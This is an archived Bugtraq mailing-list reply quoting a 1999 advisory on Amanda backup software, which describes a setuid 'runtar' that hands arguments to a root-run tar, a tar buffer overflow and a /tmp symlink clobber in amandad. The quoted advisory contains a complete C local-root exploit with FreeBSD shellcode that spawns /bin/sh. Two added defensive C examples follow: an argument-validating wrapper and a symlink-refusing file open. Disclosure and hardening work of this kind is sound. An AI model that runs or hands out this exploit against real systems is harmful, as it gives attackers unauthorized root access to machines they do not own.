[12400] in bugtraq


Re: Amanda multiple vendor local root compromises

daemon@ATHENA.MIT.EDU (monti)
Mon Nov 1 23:52:37 1999

Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id:  <Pine.BSF.3.96.991101174747.788C-100000@mournblade>
Date:         Mon, 1 Nov 1999 17:54:44 -0600
Reply-To: monti <monti@USHOST.COM>
From: monti <monti@USHOST.COM>
X-To:         "Tellier, Brock" <btellier@USA.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <381BDE3E.D5466143@usa.net>

hi,

I confirmed a few exploitable buffer overflows in multiple suid's on an
earlier version of amanda on BSDI as well, a while back. As I recollect
'runtar' was one of them.

I apologize that I can't provide anything more specific than this, but it
was some time ago and I misplaced my notes on it. Your post spurred my
memory so I figured I'd mention it.

-eric

On Sat, 30 Oct 1999, Tellier, Brock wrote:

> Greetings,
>
> OVERVIEW:
> The Amanda backup package has several vulnerabilities which
> will allow any user to gain root privs.
>
> BACKGROUND:
> My tests were done ONLY on FreeBSD 3.3-RELEASE, though this is almost
> certainly not the only vulnerable OS.  A search for "amanda-2 and not
> freebsd" on altavista yields preliminary, unconfirmed data that some of
> the vulnerable OS's (based on packages that are included on install
> CD's, anyone can install Amanda to make themselves vulnerable) may be:
> RedHat ?.?, TurboLinux, PowerTools CD, SuSE 6.2.  Confirmation on which
> OS's/tar's are vulnerable would be useful.
>
> DETAILS:
>
> Amanda's "runtar" program, suid root by default on FreeBSD 3.3, calls
> /usr/bin/tar and passes all args given to runtar to this program. Tar is
> thus run with root permissions and is vulnerable to all of the same
> attacks on suid programs that it would have if it were suid itself.
>
> Vuln #1 - run tar as root
>
> Since tar is run with root permissions, you are free to tar up any file
> you wish, including /etc/master.passwd.  You may also untar any file you
> wish, to any location on the system, including /etc/master.passwd.  This
> does not require any exploit kung-fu and may be done by supplying args
> to tar/runtar as if you were root.
>
> Vuln #1.1 - tar contains a buffer overflow
>
> Obtaining root via buffer overflow here is redundant, of course, but it
> illustrates the point that even if tar's capabilities weren't able to
> gain root privs, the buffer overflow would still allow you to do so. An
> overflow exists *IN TAR* which will allow any user to execute commands
> as root.  Note that an overflow in tar isn't an immediate security flaw
> since it is never suid/sgid, but it goes to show that one should do
> security audits of all the programs one calls with user input. By
> passing a long string to runtar in the form
> "/usr/local/libexec/amanda/runtar cvf $400bytes:bah" we can execute our
> commands.  FreeBSD exploit attached below.
>
> Vuln #2 - symlink problem
>
> Not quite as serious, but a concern nonetheless.  When the amandad
> daemon is run, a bin-owned file called "amandad.debug" is created in
> /tmp.  By creating a symlink from /tmp/amandad.debug to any other file,
> we will force amandad to clobber the contents with that of amandad's
> debug info.  Note that amandad is not suid/sgid, but it is often run
> with root perms at startup or via scripts.
>
> WHO IS VULNERABLE:
> Anyone running a suid version of runtar should be suspicious.  I've not
> tested any other O.S.'s except FreeBSD 3.3, which includes amanda 2.3.0
> and 2.4.1 as "additional packages" on the install CD and tar-1.11.2.
>
>
> EXPLOIT:
>
> /*
>  * Amanda runtar exploit yields euid=0(root)
>  * Actually overflows tar 1.11.2 (included in FreeBSD 3.3)
>  * Tested on FreeBSD 3.3, modify shell/addr/dir for Amanda/tar on other
>  * platforms
>  *
>  * Compile gcc -o amandax amandax.c
>  * Run ./amandax <offset> <buflen>
>  * keep buflen around 400, try positive and negative offsets
>  *
>  * Brock Tellier btellier@usa.net
>  */
>
>
> #include <stdlib.h>
> #include <stdio.h>
> #include <string.h>   /* memset, memcpy, strlen */
> #include <unistd.h>   /* execl */
>
> char fbsdshell[]= /* mudge@lopht.com */
>   "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
>   "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
>   "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
>   "\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh";
>
>
> #define LEN 400
> #define NOP 0x90
> #define ALIGN 3
> #define OFFSET 0
> #define ADDR 0xbfbfdd90 /* fbsd 3.3 */
>
> int main(int argc, char *argv[]) {
>
> long int offset=OFFSET;
>
> int i;
> int buflen = LEN;
> long int addr = ADDR;
> char buf[LEN];
>
> if (argc > 1) offset = atoi(argv[1]);
> if (argc > 2) buflen = atoi(argv[2]);
> if (argc > 3 || buflen > LEN) {   /* buf is only LEN bytes */
>   fprintf(stderr, "Usage: %s <offset> <buflen>\n", argv[0]);
>   exit(0);
> }
>
> fprintf(stderr, "Amanda runtar exploit for FreeBSD 3.3\n");
> fprintf(stderr, "Brock Tellier btellier@usa.net\n");
> fprintf(stderr, "Using addr: 0x%lx\t buflen: %d\t offset: %ld\n",
> addr+offset, buflen, offset);
>
> /* NOP sled, shellcode at +100, then the guessed return address repeated */
> memset(buf,NOP,buflen);
> memcpy(buf+100,fbsdshell,strlen(fbsdshell));
> for(i= 100 + strlen(fbsdshell)+ALIGN; i<buflen-4; i+=4) *(int *)&buf[i]=addr+offset;
> buf[buflen-1] = '\0';   /* terminate the argument string */
>
> execl("/usr/local/libexec/amanda/runtar", "runtar","cvf", buf, ":bah",
> NULL);
>
> exit(0);
> }
>
> Brock Tellier
> UNIX Systems Administrator
> Chicago, IL, USA
>
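
A defensive counterpart to Vuln #1 and #1.1 above: an added example of mine, not Amanda's runtar and not from Brock's post, showing how a setuid wrapper can refuse to forward arbitrary arguments to a root tar. The backup uid, the /var/backups/ tree and the 255-byte limit are assumed policy values.

```c
/* Added example, not Amanda's code: a hypothetical hardened "runtar"-style
 * setuid wrapper. The original forwarded every argument to a root tar; this
 * one pins the caller, the option shape and the argument lengths first. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define TAR_PATH    "/usr/bin/tar"   /* tar binary, as on FreeBSD 3.3 */
#define BACKUP_UID  1001             /* assumed uid of the backup account */
#define BACKUP_ROOT "/var/backups/"  /* assumed tree archives may be written to */
#define MAX_ARG_LEN 255              /* tar 1.11.2 fell over near 400 bytes */

static int path_ok(const char *p) {  /* absolute, with no ".." component */
    size_t n = strlen(p);
    return p[0] == '/' && !strstr(p, "/../") && !(n >= 3 && !strcmp(p + n - 3, "/.."));
}

/* Returns 0 if argv may be forwarded as "tar --create --file ARCHIVE SOURCE",
 * else: 1 caller is not the backup account, 2 wrong argument count, 3 wrong
 * options, 4 overlong argument, 5 path outside policy, 6 option in a path slot. */
int validate_runtar_args(uid_t real_uid, int argc, char *const argv[]) {
    if (real_uid != BACKUP_UID) return 1;
    if (argc != 5) return 2;
    for (int i = 1; i < argc; i++)           /* bound lengths before anything else */
        if (argv[i] == NULL || strlen(argv[i]) > MAX_ARG_LEN) return 4;
    if (strcmp(argv[1], "--create") != 0 || strcmp(argv[2], "--file") != 0) return 3;
    for (int i = 3; i < 5; i++) {
        if (argv[i][0] == '-') return 6;     /* "-T", "--exclude=..." are not paths */
        if (!path_ok(argv[i])) return 5;
    }
    if (strncmp(argv[3], BACKUP_ROOT, strlen(BACKUP_ROOT)) != 0) return 5;
    return 0;
}

int main(int argc, char *argv[]) {
    int rc = validate_runtar_args(getuid(), argc, argv);
    if (rc != 0) {
        fprintf(stderr, "runtar: refusing to run tar (reason %d)\n", rc);
        return 1;
    }
    char *const tar_argv[] = { "tar", argv[1], argv[2], argv[3], argv[4], NULL };
    char *const env[] = { "PATH=/bin:/usr/bin", NULL };  /* no inherited environment */
    execve(TAR_PATH, tar_argv, env);
    perror("execve");
    return 1;
}
```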

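For Vuln #2, an added example (mine, not amandad's code) of opening a debug file so that a symlink pre-planted at the expected name is refused rather than followed. The demo directory under /tmp and the owner check against the daemon's own uid are assumptions; a private, daemon-owned log directory remains the better fix, and this guards the open itself either way.

```c
/* Added example, not Amanda's code: open a debug file so that a symlink
 * planted beforehand in a shared directory such as /tmp cannot redirect the
 * daemon's write onto another file. */
#define _POSIX_C_SOURCE 200809L  /* O_NOFOLLOW, mkdtemp, symlink */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* Open `path` for appending debug output. Returns fd >= 0, or -1 with errno
 * set. Refuses a symlink at the final component and any existing inode that
 * is not a plain, singly-linked file owned by `expected_owner`. */
int open_debug_file_safely(const char *path, uid_t expected_owner) {
    int fd = open(path, O_WRONLY | O_APPEND | O_CREAT | O_NOFOLLOW, 0600);
    if (fd < 0) return -1;                  /* ELOOP (EMLINK on FreeBSD) for a symlink */
    struct stat st;
    if (fstat(fd, &st) != 0) { close(fd); return -1; }
    if (!S_ISREG(st.st_mode) || st.st_uid != expected_owner || st.st_nlink != 1) {
        close(fd);
        errno = EPERM;                      /* someone else put this inode here */
        return -1;
    }
    return fd;
}

/* Demonstration in a fresh temp dir: a plain file we own is accepted, a
 * symlink named amandad.debug pointing at it is refused. Returns 1 if both hold. */
int demo_safe_open(void) {
    char dir[] = "/tmp/amandad-demo-XXXXXX";   /* constructed demo location */
    char plain[64], link[64];
    if (mkdtemp(dir) == NULL) return 0;
    snprintf(plain, sizeof plain, "%s/plain.debug", dir);
    snprintf(link, sizeof link, "%s/amandad.debug", dir);
    /* the safe open creates a plain file of its own: accepted */
    int ok = open_debug_file_safely(plain, geteuid());
    if (ok >= 0) close(ok);
    /* a symlink planted ahead of time at the expected name: refused */
    if (symlink(plain, link) != 0) return 0;
    int fd = open_debug_file_safely(link, geteuid());
    int refused = (fd < 0 && (errno == ELOOP || errno == EMLINK));
    if (fd >= 0) close(fd);
    unlink(link); unlink(plain); rmdir(dir);
    return ok >= 0 && refused;
}
```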